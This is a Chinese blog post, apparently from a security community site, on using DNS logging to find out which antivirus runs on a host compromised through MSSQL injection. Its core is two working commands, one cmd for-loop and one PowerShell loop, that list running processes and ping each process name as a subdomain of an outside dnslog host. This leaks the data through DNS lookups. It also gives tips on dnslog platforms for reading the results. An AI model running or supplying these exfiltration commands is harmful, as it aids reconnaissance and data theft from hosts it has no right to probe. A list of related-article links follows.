如何利用dnslog探测目标主机杀软

简介: 如何利用dnslog探测目标主机杀软


0x01 前言

2021年7月某天,团队@Twe1ve老哥遇到这样一个场景:MSSQL高权限注入,目标主机不出网,想利用dnslog探测这台主机中是否存在杀软?


当时想都没想,就回了句难搞!其实还是能实现的,最后和他一起测试出了两种方法。


0x02 利用cmdshell for循环实现

两种方法原理一样,都是先获取目标主机的进程,然后通过for、ForEach循环Ping dnslog外带出来。

    for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul


    0x03 利用powershell foreach循环实现

    以下命令是@Twe1ve老哥整出来的,加了个去重,但是在实际测试过程中发现好像并没有起到去重效果。最后别忘了删除一下1.txt文件!

      powershell -c "Get-Process | select processname > 1.txt"
      powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.***fks2j.ns.dns3.cf.'} }"


      注:dnslog.cn及其他大多数dnslog平台的前端仅能展示最近十条记录,想要获取完整记录可以使用ceye.iodns.xn--9tr.com,用xn--9tr在获取记录时请打开F12看请求。

      相关文章
      |
      1月前
      |
      Linux 网络安全 Windows
      如何通过隐藏服务器真实IP来防御DDOS攻击
      如何通过隐藏服务器真实IP来防御DDOS攻击
      |
      1月前
      |
      存储 安全 网络安全
      怎么看服务器是中毒了还是被攻击?以及后续处理方案
      怎么看服务器是中毒了还是被攻击?以及后续处理方案
      |
      1月前
      |
      网络协议 Unix Linux
      【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
      【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
      105 0
      Clumsy 利用无线网卡结合Clumsy软件模拟弱网络测试
      Clumsy 利用无线网卡结合Clumsy软件模拟弱网络测试
      135 0
      |
      8月前
      |
      域名解析 网络协议 网络安全
      网络 | 排错五大步骤,没有解决不了的网络故障准达信息准达信息
      网络 | 排错五大步骤,没有解决不了的网络故障准达信息准达信息
      50 0
      |
      监控 算法
      Booth算法在局域网监控软件中的运用和具体例子
      通过使用Booth算法,局域网监控软件可以更加高效地完成IP地址匹配、范围查询和信息更新等任务,提高软件的性能和效率,从而更好地满足用户的监控和管理需求
      260 0
      |
      网络协议 网络虚拟化 网络架构
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验(上)
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验
      4029 1
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验(上)
      |
      负载均衡 网络协议 安全
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验(下)
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验纪实
      3861 1
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验(下)
      |
      网络协议 数据库 数据安全/隐私保护
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验(中)
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验
      3931 1
      路由与交换利用ENSP模拟器分析和配置中小型企业网络的综合实验(中)